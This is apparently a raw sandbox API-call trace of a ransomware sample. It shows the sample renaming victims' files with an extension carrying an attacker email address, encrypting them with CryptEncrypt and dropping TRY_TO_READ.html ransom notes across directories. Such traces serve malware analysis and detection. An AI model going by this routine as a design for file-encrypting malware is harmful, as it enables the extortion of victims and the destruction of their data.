[0167.684] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\d4AgPLI8a274Ce.mkv", dwFileAttributes=0x80) returned 1 [0167.684] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\d4AgPLI8a274Ce.mkv") returned 75 [0167.684] GetProcessHeap () returned 0x2e0000 [0167.684] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363b58 [0167.684] lstrcpyW (in: lpString1=0x363b58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\d4AgPLI8a274Ce.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\d4AgPLI8a274Ce.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\d4AgPLI8a274Ce.mkv" [0167.684] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\d4AgPLI8a274Ce.mkv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\d4AgPLI8a274Ce.mkv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\d4AgPLI8a274Ce.mkv.12781717671972518758.ex_parvis@aol.com.AIR" [0167.684] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\d4AgPLI8a274Ce.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\d4agpli8a274ce.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\d4AgPLI8a274Ce.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\d4agpli8a274ce.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.686] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\d4AgPLI8a274Ce.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\d4agpli8a274ce.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x570 [0167.686] GetProcessHeap () returned 0x2e0000 [0167.686] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363b58 | out: hHeap=0x2e0000) returned 1 [0167.686] GetFileSizeEx (in: hFile=0x570, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=28373) returned 1 [0167.686] SetFilePointer (in: hFile=0x570, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x6ed5 [0167.686] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.686] GetProcessHeap () returned 0x2e0000 [0167.686] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.686] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.687] WriteFile (in: hFile=0x570, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.687] WriteFile (in: hFile=0x570, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.687] WriteFile (in: hFile=0x570, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.688] ReadFile (in: hFile=0x570, lpBuffer=0x30f0048, nNumberOfBytesToRead=0x6ed5, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesRead=0x2acf9c8*=0x6ed5, lpOverlapped=0x0) returned 1 [0167.688] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.688] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.689] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\AcBo-RW.mp4", dwFileAttributes=0x80) returned 1 [0167.689] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\AcBo-RW.mp4") returned 68 [0167.689] GetProcessHeap () returned 0x2e0000 [0167.689] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xee) returned 0x30a498 [0167.689] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\AcBo-RW.mp4" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\AcBo-RW.mp4") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\AcBo-RW.mp4" [0167.689] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\AcBo-RW.mp4", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\AcBo-RW.mp4.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\AcBo-RW.mp4.12781717671972518758.ex_parvis@aol.com.AIR" [0167.689] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\AcBo-RW.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\acbo-rw.mp4"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\AcBo-RW.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\acbo-rw.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.692] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\AcBo-RW.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\acbo-rw.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x570 [0167.692] GetProcessHeap () returned 0x2e0000 [0167.692] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0167.692] GetFileSizeEx (in: hFile=0x570, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=94839) returned 1 [0167.692] SetFilePointer (in: hFile=0x570, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x17277 [0167.692] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.692] GetProcessHeap () returned 0x2e0000 [0167.692] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.692] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.692] WriteFile (in: hFile=0x570, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.693] WriteFile (in: hFile=0x570, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.693] WriteFile (in: hFile=0x570, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.694] ReadFile (in: hFile=0x570, lpBuffer=0x30f0048, nNumberOfBytesToRead=0x17277, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesRead=0x2acf9c8*=0x17277, lpOverlapped=0x0) returned 1 [0167.696] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Adobe\\Acrobat\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xb18089f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb18089f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1b68 [0167.697] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Adobe\\Acrobat\\10.0\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x574 [0167.699] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xb18089f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb18089f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1ba8 [0167.699] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x578 [0167.702] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Mozilla\\logs\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb19d1a70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb19d1a70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1be8 [0167.703] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.703] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.703] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log", dwFileAttributes=0x80) returned 1 [0167.703] lstrlenW (lpString="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log") returned 63 [0167.703] GetProcessHeap () returned 0x2e0000 [0167.703] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe4) returned 0x3ac428 [0167.704] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log" | out: lpString1="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log") returned="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log" [0167.704] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log.12781717671972518758.ex_parvis@aol.com.AIR" [0167.704] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log"), lpNewFileName="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.706] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x57c [0167.707] GetProcessHeap () returned 0x2e0000 [0167.707] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0167.707] GetFileSizeEx (in: hFile=0x57c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=164) returned 1 [0167.707] SetFilePointer (in: hFile=0x57c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xa4 [0167.707] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.707] GetProcessHeap () returned 0x2e0000 [0167.707] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.707] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.707] WriteFile (in: hFile=0x57c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.709] WriteFile (in: hFile=0x57c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.709] WriteFile (in: hFile=0x57c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.709] ReadFile (in: hFile=0x57c, lpBuffer=0x31d0048, nNumberOfBytesToRead=0xa4, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0048*, lpNumberOfBytesRead=0x2acf9c8*=0xa4, lpOverlapped=0x0) returned 1 [0167.709] SetFilePointer (in: hFile=0x57c, lDistanceToMove=-164, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.709] WriteFile (in: hFile=0x57c, lpBuffer=0x3af428*, nNumberOfBytesToWrite=0xa4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3af428*, lpNumberOfBytesWritten=0x2acf9c8*=0xa4, lpOverlapped=0x0) returned 1 [0167.710] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xb19d1a70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb19d1a70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1c28 [0167.710] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x580 [0167.711] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb19d1a70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb19d1a70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1c68 [0167.712] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0167.714] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xb19d1a70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb19d1a70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1ca8 [0167.714] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0167.716] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xb19d1a70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb19d1a70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1ce8 [0167.716] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.716] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.716] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe", dwFileAttributes=0x80) returned 1 [0167.717] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned 89 [0167.717] GetProcessHeap () returned 0x2e0000 [0167.717] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x118) returned 0x319c88 [0167.717] lstrcpyW (in: lpString1=0x319c88, lpString2="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" [0167.717] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.AIR" [0167.717] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.720] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58c [0167.720] GetProcessHeap () returned 0x2e0000 [0167.720] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319c88 | out: hHeap=0x2e0000) returned 1 [0167.720] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=455720) returned 1 [0167.720] SetFilePointer (in: hFile=0x58c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x6f428 [0167.720] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.720] GetProcessHeap () returned 0x2e0000 [0167.720] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.720] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.720] WriteFile (in: hFile=0x58c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.722] WriteFile (in: hFile=0x58c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.722] WriteFile (in: hFile=0x58c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.724] ReadFile (in: hFile=0x58c, lpBuffer=0x30f0048, nNumberOfBytesToRead=0x6f428, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesRead=0x2acf9c8*=0x6f428, lpOverlapped=0x0) returned 1 [0167.741] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.741] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.741] 